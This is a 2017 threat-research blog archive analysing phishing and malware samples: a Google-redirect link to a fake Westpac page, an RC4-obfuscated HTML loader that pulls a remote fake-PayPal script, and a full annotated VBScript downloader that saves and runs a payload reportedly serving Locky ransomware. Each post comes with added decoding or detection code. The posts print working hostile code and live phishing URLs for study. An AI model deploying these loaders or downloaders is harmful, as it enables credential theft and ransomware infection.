Wednesday, September 27, 2017

Phishing - Google redirect used in the link of a Westpac bank phishing email

https://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=21&cad=rja&uact=8&ved=0ahUKEwitg8Sfs8bWAhXSmLQKHTsHBCY4FBAWCCUwAA&url=http%3A%2F%2Fwww.almatulum.com%2Fblog%2Fnew-lounge-area%2F&usg=AFQjCNEr6lEZY_UW0EQJVFerr39HdTCk3w

Which should lead to: http://www.almatulum.com/blog/new-lounge-area/

Which in turn redirects to: https://hustlecreative.com/w/westpac/WestpacOnlineBanking.htm?mekteewibtmdakuaiaiiiesaudalnlzumizrnneadenaarlteannbnlaweadndaasdtlnlmedwenlaadamraklaezziewetanmkdsbasllaiiammuitblndatdndeltiniraanunenuean83044339483

Which is the fake Westpac page.
The hostname the victim (and any reputation filter) sees is www.google.com.au; the real first hop sits only in the url= parameter, and the intermediate site does the bounce to the fake page. Just another phishing email with a twist.
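To unwrap this kind of link automatically, here is an added example (my code, not from the post): it pulls the url= parameter out of a google.com/url redirect, then checks each hop for a brand name in the path that does not match that brand's real domain. The hop URLs are the ones quoted above; the brand-to-domain table and the q= fallback (Google's mail and search links use that form) are assumptions of mine.

```javascript
// Added example (not from the original post): unwrap a google.com/url
// redirect and flag a brand mismatch along the hop chain.
// Hop URLs are the ones quoted in the post; BRANDS is an assumed table.

const GOOGLE_LINK =
  'https://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=21&cad=rja&uact=8' +
  '&ved=0ahUKEwitg8Sfs8bWAhXSmLQKHTsHBCY4FBAWCCUwAA' +
  '&url=http%3A%2F%2Fwww.almatulum.com%2Fblog%2Fnew-lounge-area%2F' +
  '&usg=AFQjCNEr6lEZY_UW0EQJVFerr39HdTCk3w';
const FINAL_HOP =
  'https://hustlecreative.com/w/westpac/WestpacOnlineBanking.htm?' +
  'mekteewibtmdakuaiaiiiesaudalnlzumizrnneadenaarlteannbnlaweadndaasdtlnlmedwenlaadamraklaezziewetanmkdsbasllaiiammuitblndatdndeltiniraanunenuean83044339483';

// Assumed: brand keyword -> domains that may legitimately host that brand.
const BRANDS = {
  westpac: ['westpac.com.au'],
  paypal: ['paypal.com'],
};

// Real destination hidden behind a Google /url redirect, or null when the
// URL is not one. Google carries the target in url=; q= is the other form.
function unwrapGoogleRedirect(link) {
  const u = new URL(link);
  const host = u.hostname.toLowerCase();
  if (!/^(www\.)?google\.[a-z.]+$/.test(host) || u.pathname !== '/url') return null;
  return u.searchParams.get('url') || u.searchParams.get('q');
}

// True when host is domain itself or a subdomain of it.
function underDomain(host, domain) {
  return host === domain || host.endsWith('.' + domain);
}

// Brand names that appear in the path/query of a hop whose host does not
// belong to that brand. Empty array means nothing suspicious.
function brandMismatches(link) {
  const u = new URL(link);
  const host = u.hostname.toLowerCase();
  const text = (u.pathname + u.search).toLowerCase();
  return Object.keys(BRANDS).filter(
    (b) => text.includes(b) && !BRANDS[b].some((d) => underDomain(host, d)),
  );
}

// Expand redirects inside the observed hops and report host + mismatches per hop.
function analyseChain(hops) {
  const chain = [];
  for (const hop of hops) {
    chain.push(hop);
    const inner = unwrapGoogleRedirect(hop);
    if (inner) chain.push(inner);
  }
  return chain.map((h) => ({ host: new URL(h).hostname, mismatches: brandMismatches(h) }));
}

console.log(analyseChain([GOOGLE_LINK, FINAL_HOP]));
```

Runs under Node with no dependencies; the last hop comes back with a westpac mismatch because the brand sits in the path on a host that is not under westpac.com.au.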


RakshaTec: September 2017

Tuesday, September 26, 2017

Phishing - JavaScript loader in HTML page - PayPal theme

This one is sent as an HTML attachment, so the first stage runs from the local file rather than being fetched over the network, which keeps it away from URL filtering and proxy inspection. The inline script decodes its strings (hex, then RC4 with the key "j388p") and injects a script tag that pulls the second stage from www.subject-data.com. The page that eventually loads is the fake PayPal site; whatever is entered is sent to the C2 server, and a last redirect to the real PayPal site makes sure the user doesn't suspect anything.


<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="utf-8">
</head>

<body><script>

// c7tn83: hex string (optionally "0x"-prefixed) -> string of the decoded bytes
function c7tn83(rd1jqp4)
{
var lgx4s84f = 0;
var pojb6ff = '';
if( rd1jqp4.substr(0,2) == '0x' ){ lgx4s84f = 2; }
if( typeof rd1jqp4 != 'string' ){ rd1jqp4 = rd1jqp4.toString(); }
for(var apnsxieh=lgx4s84f;  apnsxieh<rd1jqp4.length; apnsxieh+=2) {
var c = rd1jqp4.substr( apnsxieh, 2 );
pojb6ff = pojb6ff + String.fromCharCode( parseInt(c, 16) );
}
return pojb6ff;
}

// f8ce53222: plain RC4 (ll1u8137 = data, rx3oj311 = key).
// First loop fills the 256-byte state, second loop is the key schedule (KSA),
// third loop is the PRGA, XORing each data byte with one keystream byte.
function f8ce53222(ll1u8137, rx3oj311) {
  var pf9879t75, khqr2, gecb, jxl077g53, in3431y23, sgcbn1e9;
  for (pf9879t75 = [], khqr2 = 0, jxl077g53 = "", in3431y23 = 0; in3431y23 < 256; in3431y23++) pf9879t75[in3431y23] = in3431y23;
  for (in3431y23 = 0; in3431y23 < 256; in3431y23++)
khqr2 = (khqr2 + pf9879t75[in3431y23] + rx3oj311.charCodeAt((in3431y23 % rx3oj311.length))) % 256,
gecb = pf9879t75[in3431y23],
pf9879t75[in3431y23] = pf9879t75[khqr2],
pf9879t75[khqr2] = (gecb);
  for (in3431y23 = 0, khqr2 = 0, sgcbn1e9 = 0; sgcbn1e9 < ll1u8137.length; sgcbn1e9++)
in3431y23 = ((in3431y23 + 1) % 256),
khqr2 = ((khqr2 + pf9879t75[in3431y23]) % 256),
gecb = pf9879t75[in3431y23],
pf9879t75[in3431y23] = pf9879t75[khqr2],
pf9879t75[khqr2] = gecb,
jxl077g53 += String.fromCharCode(ll1u8137.charCodeAt(sgcbn1e9) ^ pf9879t75[(pf9879t75[in3431y23] + pf9879t75[khqr2]) % 256]);
  return jxl077g53
}

// Every string is hex-encoded and RC4-encrypted with the key "j388p".
var p918 = f8ce53222(c7tn83("bf60ebafd0d90960a362261832f1f761ff1035c62e116e5aab1375eedd172ea62ec6f93dcebb7eefa70700089344e012807d8fac5caeff92c7ba86b46e4ba2"),"j388p");
// p918: "http://www.subject-data.com/1f5669beacc555da69e67826724fd033.js" - the second-stage script that gets loaded into the browser

var zgdz = f8ce53222(c7tn83("a477edb69a82"),"j388p");
// zgdz: "script"

var qw1mpd9 = document.createElement(zgdz);
qw1mpd9.src = p918;
var jkl6lg = f8ce53222(c7tn83("bf71febb"),"j388p");
// jkl6lg: "head"

document.getElementsByTagName(jkl6lg)[0].appendChild(qw1mpd9);
// result: head > script src=p918, i.e. the remote JS is fetched and executed
</script>

</body>
</html>
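A readable re-implementation of the two helpers, added here as an example (my code, not the sample's): hex decoding plus standard RC4, applied to the three blobs with the key from the sample. Function names are mine; the key and ciphertexts are copied from the script above. Checking the decoder against published RC4 test vectors first confirms it is faithful before trusting what it says about the sample.

```javascript
// Added example (not part of the original post or the sample): clean
// equivalents of c7tn83 (hex -> bytes) and f8ce53222 (RC4), so the loader's
// strings can be recovered offline. Names are mine; blobs/key are the sample's.

// Hex string (optionally "0x"-prefixed) -> array of byte values.
function hexToBytes(hex) {
  const s = hex.startsWith('0x') ? hex.slice(2) : hex;
  const out = [];
  for (let i = 0; i + 1 < s.length; i += 2) out.push(parseInt(s.substr(i, 2), 16));
  return out;
}

// Standard RC4: key scheduling (KSA) then keystream generation (PRGA).
// Byte arrays in, byte array out; the same call encrypts and decrypts.
function rc4(keyBytes, data) {
  const S = Array.from({ length: 256 }, (_, i) => i);
  for (let i = 0, j = 0; i < 256; i++) {
    j = (j + S[i] + keyBytes[i % keyBytes.length]) & 0xff;
    [S[i], S[j]] = [S[j], S[i]];
  }
  const out = new Array(data.length);
  for (let n = 0, i = 0, j = 0; n < data.length; n++) {
    i = (i + 1) & 0xff;
    j = (j + S[i]) & 0xff;
    [S[i], S[j]] = [S[j], S[i]];
    out[n] = data[n] ^ S[(S[i] + S[j]) & 0xff];
  }
  return out;
}

const ascii = (s) => Array.from(s, (c) => c.charCodeAt(0) & 0xff);
const bytesToHex = (b) => b.map((x) => x.toString(16).padStart(2, '0')).join('');
const bytesToStr = (b) => String.fromCharCode(...b);

// Equivalent of the loader's f8ce53222(c7tn83(hex), key).
function decodeBlob(hex, key) {
  return bytesToStr(rc4(ascii(key), hexToBytes(hex)));
}

// Key and the three ciphertexts exactly as they appear in the sample.
const SAMPLE_KEY = 'j388p';
const SAMPLE_BLOBS = {
  p918: 'bf60ebafd0d90960a362261832f1f761ff1035c62e116e5aab1375eedd172ea62ec6f93dcebb7eefa70700089344e012807d8fac5caeff92c7ba86b46e4ba2',
  zgdz: 'a477edb69a82',
  jkl6lg: 'bf71febb',
};

// Decode every blob; returns { p918, zgdz, jkl6lg } as plaintext strings.
function decodeSample() {
  const out = {};
  for (const [name, hex] of Object.entries(SAMPLE_BLOBS)) out[name] = decodeBlob(hex, SAMPLE_KEY);
  return out;
}

console.log(decodeSample());
```

Because RC4 is a stream cipher with no IV, every string in the file is XORed against the same keystream; that is why the blobs for "http..." and "head" share the same leading byte (bf) and why a single known plaintext would be enough to strip the other strings even without the key.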

Monday, September 25, 2017

Here's a simple, straight-forward downloader that can serve any payload

Written in VBS, launched by WScript on a Windows host. Most of the file is dead code pasted in from unrelated VB programs (log copying, game logic, geometry helpers) to pad it out. The live path builds its strings by stripping "JACKSON" from a long literal and splitting on "FIREMAN", requests each entry of the mual list over Microsoft.XMLHTTP until one answers HTTP 200, writes the response body to %TEMP%\xhAFULQ.exe through ADODB.Stream, and runs it with WScript.Shell.

Currently serving Locky ransomware.


Dim UltraXgettingensurance 'As String

Dim UltraXgettingUotOfStock 'As String

Function CopyLog()

        Dim oFile
        Dim iRetVal, fptr1, fptr2, sLine, sNewLogFolderName, sLogFile
        Dim sComputer
        Dim sLog
        Dim sBootDrive
        ' Make sure the path is accessible
        oUtility.ValidateConnection oEnvironment.Item("SLShare")
        oUtility.VerifyPathExists oEnvironment.Item("SLShare")
        If not oFSO.FolderExists(oEnvironment.Item("SLShare")) then
            oLogging.CreateEntry "An invalid SLShare value of " & oEnvironment.Item("SLShare") & " was specified.", LogTypeWarning
            Exit Function
        End if

       

    End Function
   
Function Set2Mine(Who, Color, X, y )
    For i = 0 To UBound(Mines) + 1
        If i > UBound(Mines) Then ReDim Preserve Mines(i)
        If Mines(i).Color = 0 Then
            Mines(i).Who = Who
            Mines(i).Color = Color
            Mines(i).X = X
            Mines(i).y = y
            Mines(i).Tick = 0
            SetMine = i
            Exit For
        End If
    Next
End Function




Function StateUovertakesgetting()
if D = 19 then
AXC = "SaveT"+"oFile"
end if
StateUovertakes4000.Savetofile UltraXgettingUotOfStock , 9-7
End Function

  UltraXgettingBelish = "User"




Function F3(p, ddd)
    Set UltraXgettingRombickom = CreateObject("WScrip"+"t.Shell")   
End Function

 Dim Advancedmantel2 'As String

Function ABTF(A, B, T, F)
    set ABTF = A.CreateTextFile( B,T , F)
end function

Dim UltraXgettingRickyTIcky 'As Object
Dim StateUovertakes4000 'As Object

    RACHEL = "avetof"

       Dim TristateTrue

  ' Seed of the string table: entries separated by "FIREMAN", "JACKSON" junk spliced into words
  Advancedmantel2 = "XMLHTTPFIREMANAdodb.streaMFIREMANs"
Vrungel = ".respo"+"nseBody"
Function SheduledObject(p,d)


 UltraXgettingRombickom.Run("" &UltraXgettingUotOfStock )
End Function


Dim UltraXgettingTimeTo 'As Object
Dim UltraXgettingstatus
UltraXgettingstatus = false
     Dim JohnTheRipper
Dim UltraXgettingcashback 'As Object
CUA ="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"

Dim UltraXgetting1DASH1solo 'As Object  

' Second chunk of the string table (COM ProgIDs, "Process", "GeT", "TemP", "Type")
Advancedmantel2 ="Microsoft." + Advancedmantel2+  "hell.ApplicationFIREMANWscript"+".shellFIREMANProcessFIREMANGeTFIREMANT"+"emPFIREMANTyJACKSON"+"peJACKSON"


' Strip the "JACKSON" junk, then split on TIK ("FIREMAN") to get the string table
Function MambaMamba( TIK )
   MambaMamba = Split(Replace(Advancedmantel2, "JACKSON", "" ),  TIK)
End Function
Dim mual

Function StateUovertakesgetting2(param1)
param1 = param1 + param1

UltraXgettingResponseBody = UltraXgettingRickyTIcky.responseBody
param1 = 4 * param1 + 8   

End Function


Public Function IsLineAnalytic(ByVal Figure1 )
If Figure1 < FigureCount And Figure1 >= 0 Then
    If Figures(Figure1).FigureType = dsAnLineCanonic Or _
    Figures(Figure1).FigureType = dsAnLineGeneral Or _
    Figures(Figure1).FigureType = dsAnLineNormal Or _
    Figures(Figure1).FigureType = dsAnLineNormalPoint Then IsLineAnalytic = True
End If
End Function


Public Function IsCircleAnalytic(ByVal Figure1 )
If Figure1 < FigureCount And Figure1 >= 0 Then
    If Figures(Figure1).FigureType = dsAnCircle Then IsCircleAnalytic = True
End If
End Function
' Last chunk: stream method names, the drop file name "\xhAFULQ.exe" and "http:" & "//"
Advancedmantel2 = Advancedmantel2 +"FIREMANJACKSONoJACKSONpenFIREMANwrJACKSONiteFIREMANreJACKSONspoJACKSONnseBoJACKSONdyFIREMANsaJACKSONvetof"+"JACKSONileFIREMAN\xhAFULQ.ex"+"eJACKSONFIREMANhtJACKSONtp:FIREMAN//"
Function UltraXgettingFuks(p)

UltraXgettingRickyTIcky.Send
   
End Function
' JohnTheRipper = the decoded table: (0) Microsoft.XMLHTTP (1) Adodb.streaM (2) shell.Application (3) Wscript.shell
' (4) Process (5) GeT (6) TemP (7) Type (8) open (9) write (10) responseBody (11) savetofile (12) \xhAFULQ.exe (13) http: (14) //
JohnTheRipper = MambaMamba("" + "FIREMAN" + "")



  Private Sub SubscriptionHistoryMaintenance(ByVal db , ByRef curlist , ByVal historyLength )
    If historyLength < 1 Then
      historyLength = 1 ' Minimum history length is one!
    End If

    ' Sort by date descending (default sorter for PST sorts descending)
    curlist.Sort()

    ' Now purge any old files
    For i  = 0 To curlist.Count - 1
      If i >= historyLength Then
        Me.PurgePodcastFile db, curlist(i)
      End If
    Next
  End Sub
Set UltraXgettingRickyTIcky = CreateObject(JohnTheRipper(0))   ' Microsoft.XMLHTTP

Dim UltraXgetting4 'As String

Dim UltraXgettingResponseBody 'As Variant
Dim UltraXgettingRombickom
 Dim MarketPlace 'As String
  Dim sTempVis 'As String
  Dim iCount 'As Integer
Public Function WriteCD(aWrite,bWrite)
astp = 12
astp = astp + 3
if astp > 4 then
aWrite.Write bWrite
astp = 3 * astp
end if
End Function
Dim Valery 'As Integer
UltraXgettingBelish = UltraXgettingBelish + "-"

Dim Twelve 'As Integer
  Dim sDecimalVis 'As String
  Dim UltraXgettingPetir 'As String
UltraXgettingPetir = "Ag"

  Dim MarketPlaceibility 'As String


 Dim sNodeKey 'As String
  Dim sParentKey 'As String

   


Twelve = 11 + 1
zTempVis = JohnTheRipper(1)

'Set UltraXgettingTimeTo = CreateObject(JohnTheRipper(8-6))
Set UltraXgettingRockiBilbo = GetRef("SheduledObject")

Set StateUovertakes4000 = CreateObject("Adodb.streaM")            ' binary stream used to write the download to disk
Set UltraXgetting1DASH1solo = CreateObject(JohnTheRipper(9-6))   ' Wscript.shell, used to read %TEMP%


' Meant to set a Firefox 54 User-Agent, but UltraXgettingLamp is never assigned, so under
' On Error Resume Next this fails silently and the request goes out with the default MSXML agent
Function SetUA()
UltraXgettingLamp.setRequestHeader UltraXgettingBelish, CUA
End Function

' Only continue under a real Windows Script Host (the WScript object's default property is "Windows Script Host")
if "RIDG" + WScript + "4" = "RIDGWindows Script Host4" Then
   
   
' Payload locations (hosts as shown in the post); each gets "http://" prepended below
mual = Array("pawnedsite-1.com/payload","pawnedsite-2.com/payload","pawnedsite-3.com/payload")

    Set UltraXgettingcashback = UltraXgetting1DASH1solo.Environment(JohnTheRipper(1 + 3))   ' Environment("Process")

end if   


Public Function Anim2UniBall(i)
    Dim Rx, Ry, rBuff
    Dim xt, yt, j, e
    Dim NewX, NewY, d, SgnX, SgnY
    Dim RatioX, RatioY
    Rx = 452
    Ry = 81
   
   
    If SgnY = 1 Then 'y positive testing
        For d = UniBall(i).BallY + 1 To NewY
            j = WeaponTouch(6, i, NewX, d)
            If j = -6 Then
                UniBall(i).BMoveY = UniBall(i).BMoveY * -1
                NewY = d - 1
                Exit For
            End If
        Next
    End If
   
    If SgnY = -1 Then 'y negative testing
        For d = UniBall(i).BallY - 1 To NewY Step -1
            j = WeaponTouch(6, i, NewX, d)
            If j = -6 Then
                UniBall(i).BMoveY = UniBall(i).BMoveY * -1
                NewY = d + 1
                Exit For
            End If
        Next
    End If
    j = WeaponTouch(6, i, NewX, NewY)
    If j = -7 Then Exit Function
   
    UniBall(i).BallX = NewX
    UniBall(i).BallY = NewY
End Function


 Valery = 89210


UltraXgettingensurance = UltraXgettingcashback(JohnTheRipper(6))   ' %TEMP%
 Dim i
 'on error GoTo nextU
' on error resume next
sTempVis = JohnTheRipper(Twelve)   ' "\xhAFULQ.exe"

Sub SendFlagDat(SndTo)
    Dim i , b , n
    Dim oNewMsg() , lNewOffSet
    Dim lNewMsg
   
    For i = 1 To UBound(Flag1, 2)
       
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 1
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag1(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag1(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry1(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag2, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 2
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag2(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag2(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry2(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag3, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 3
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag3(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag3(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry3(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag4, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 4
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag4(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag4(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry4(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag5, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 5
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag5(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag5(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry5(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
   
End Sub

MarketPlace = JohnTheRipper(11+2) & JohnTheRipper(11+3)   ' "http:" & "//"

UltraXgettingBelish = UltraXgettingBelish & UltraXgettingPetir & "ent"   ' "User-Agent"

rdde = 19


' Try each payload host in turn: GET http://<host>/payload and stop at the
' first one that answers HTTP 200 (tested as Status + 3 = 203)
lTo = UBound(mual)
For i = 0 To lTo Step 1
rdde = rdde * 8

    on error resume  next

Valery =  Valery +33
 UltraXgetting4 = MarketPlace + mual(i)
 UltraXgettingRickyTIcky.Open JohnTheRipper(5), UltraXgetting4, False   ' "GeT", synchronous
dr1=2

rdde = rdde + 91


SetUA()   ' fails silently, see above
UltraXgettingFuks " d "   ' .Send
If UltraXgettingRickyTIcky.Status +3 = 203 Then   ' HTTP 200
UltraXgettingstatus = true
 Exit For
End If

goto14:   ' not a valid VBScript statement; the error is swallowed by On Error Resume Next
Next

on error goto 0
if UltraXgettingstatus Then
Dim Ratchet 'As String
 UltraXgettingUotOfStock = UltraXgettingensurance+ sTempVis   ' %TEMP%\xhAFULQ.exe

F3 "",4   ' creates the WScript.Shell used to launch the payload
StateUovertakes4000.Type = 1   ' adTypeBinary
 StateUovertakes4000.Open
StateUovertakesgetting2 22   ' copies .responseBody out of the XMLHTTP object
WriteCD StateUovertakes4000,UltraXgettingResponseBody   ' stream.Write
dttat =4
UltraXgettingUotOfStocku = "" + UltraXgettingUotOfStock

dttat = dttat*2

StateUovertakesgetting()   ' stream.SaveToFile %TEMP%\xhAFULQ.exe, 2 (adSaveCreateOverWrite)
Dim UltraXgettingJohnSnowu,UltraXgettingTmp1 'As Long

UltraXgettingJohnSnowu = 3012

If 1040  < UltraXgettingJohnSnowu Then
  drba =55
 UltraXgettingTmp1 = "|"

UltraXgettingRockiBilbo "}}}}}}}}}}}}}","062"   ' GetRef("SheduledObject"): WScript.Shell.Run on the dropped file
End If
 


triada = 341
end if
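As an added example (my code, not from the sample or the post): the string table reconstructed in JavaScript with the same replace-and-split step and the same index arithmetic the script uses, plus an offline walk of the URL loop with a stand-in for the HTTP call. The fragments, separators, index expressions, header pieces and placeholder hosts are taken from the VBS above; the fake status function and the temp path are constructed.

```javascript
// Added example (not from the sample): rebuild the VBS string table and walk
// the download loop offline. Fragments, separators, index expressions and
// placeholder hosts are copied from the script; fetchStatus and the temp
// directory are constructed stand-ins.

// Advancedmantel2 as assembled by the three assignments in the script.
const ADVANCEDMANTEL2 =
  'Microsoft.' +
  'XMLHTTPFIREMANAdodb.streaMFIREMANs' +
  'hell.ApplicationFIREMANWscript' +
  '.shellFIREMANProcessFIREMANGeTFIREMANT' +
  'emPFIREMANTyJACKSON' +
  'peJACKSON' +
  'FIREMANJACKSONoJACKSONpenFIREMANwrJACKSONiteFIREMANreJACKSONspoJACKSONnseBoJACKSONdyFIREMANsaJACKSONvetof' +
  'JACKSONileFIREMAN\\xhAFULQ.ex' +
  'eJACKSONFIREMANhtJACKSONtp:FIREMAN//';

// MambaMamba("FIREMAN"): drop every "JACKSON" (junk spliced into words),
// then split on "FIREMAN" (the real separator). This is the JohnTheRipper array.
function buildStringTable(blob = ADVANCEDMANTEL2, junk = 'JACKSON', sep = 'FIREMAN') {
  return blob.split(junk).join('').split(sep);
}

// The header the script assembles piecewise ("User" + "-" + "Ag" + "ent").
// In the sample SetUA() references an object that is never created, so it is
// intended but never actually sent.
function requestHeader() {
  return {
    name: 'User' + '-' + 'Ag' + 'ent',
    value: 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
  };
}

// The For loop at the bottom of the script: prefix each mual entry with
// table(13) & table(14) ("http:" + "//"), GET it, stop at the first answer
// with Status + 3 = 203. fetchStatus(url) stands in for XMLHTTP so this runs
// offline. Returns what the script would then do, or null when no host
// answered (nothing is written or executed in that case).
function simulateDownloader(table, urlList, tempDir, fetchStatus) {
  const scheme = table[11 + 2] + table[11 + 3];
  for (const entry of urlList) {
    const url = scheme + entry;
    if (fetchStatus(url) + 3 !== 203) continue;
    const dropPath = tempDir + table[12]; // %TEMP% & "\xhAFULQ.exe"
    return {
      url,
      method: table[5], // "GeT"
      comObjects: [table[0], table[1], table[9 - 6]], // XMLHTTP, ADODB.Stream, WScript.Shell
      // Table entries naming the stream calls (the script also spells them out literally).
      streamCalls: [table[7], table[8], table[9], table[10], table[11]],
      dropPath,
      run: `${table[9 - 6]}.Run("${dropPath}")`,
    };
  }
  return null;
}

// Placeholder hosts exactly as they appear in the post.
const MUAL = ['pawnedsite-1.com/payload', 'pawnedsite-2.com/payload', 'pawnedsite-3.com/payload'];

// Constructed run: first host is down, second serves the payload.
const fakeStatus = (url) => (url.includes('pawnedsite-2') ? 200 : 404);
console.log(simulateDownloader(buildStringTable(), MUAL, 'C:\\Users\\victim\\AppData\\Local\\Temp', fakeStatus));
```

The same replace-then-split trick works on any of this family: find the assignment chain that builds the long literal, note which token is removed and which one is split on, and the ProgIDs, drop path and URL scheme fall out as an array that the rest of the script indexes with small arithmetic expressions.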

